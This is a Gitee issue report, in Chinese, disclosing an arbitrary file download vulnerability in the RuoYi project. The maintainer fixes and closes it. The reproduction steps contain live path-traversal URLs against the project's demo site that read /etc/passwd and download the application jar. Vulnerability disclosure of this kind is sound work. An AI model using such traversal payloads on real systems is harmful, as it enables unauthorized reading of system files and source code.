5.2K Star 32.2K Fork 17.1K

GVP若依 / RuoYi

 / 详情

任意文件读取漏洞 紧急

Done
Opened this issue  
2020-11-16 18:53

项目上线被扫除安全漏洞问题,可以下载服务器上任意文件 。如下:
输入图片说明

输入图片说明

ruoyi在线demo 也复现了这个漏洞,任意文件下载

https://demo.ruoyi.vip/
输入图片说明

复现步骤如下:

  1. 登录 https://demo.ruoyi.vip/
  2. 打开以下链接会自动下载服务器上的文件 (/etc/passwd可以替换为任意文件绝对路径):
    https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../etc/passwd
    输入图片说明
    输入图片说明
    下载的文件如下:输入图片说明

输入图片说明

demo源代码下载地址:https://demo.ruoyi.vip/common/download/resource?resource=/profile/../../../../home/ruoyi/projects/ruoyi/target/ruoyi.jar

输入图片说明

Comments (3)

fengyibo created任务
fengyibo set related repository to 若依/RuoYi
fengyibo changed description
fengyibo changed description
fengyibo changed description
fengyibo changed description
fengyibo changed description
fengyibo changed title
fengyibo changed description
fengyibo changed title
fengyibo changed description
fengyibo changed description
Expand operation logs

嗯,多谢提醒。已修复。
阻止任意文件下载漏洞
https://gitee.com/y_project/RuoYi/commit/18f6366f2e6908a151e02d0c18f1aa490e7d0a54

若依 changed issue state from 待办的 to 已完成

请问下这是什么扫描器,挺厉害的

直接扫的若依的这个漏洞,没什么厉害的。这又不是什么0day

Sign in to comment

Status
Assignees
Milestones
Pull Requests
Successfully merging a pull request will close this issue.
Branches
Planed to start   -   Planed to end
-
Top level
Priority
参与者(4)
1151004 y project 1578942802
Java
1
https://gitee.com/y_project/RuoYi.git
git@gitee.com:y_project/RuoYi.git
y_project
RuoYi
RuoYi

Search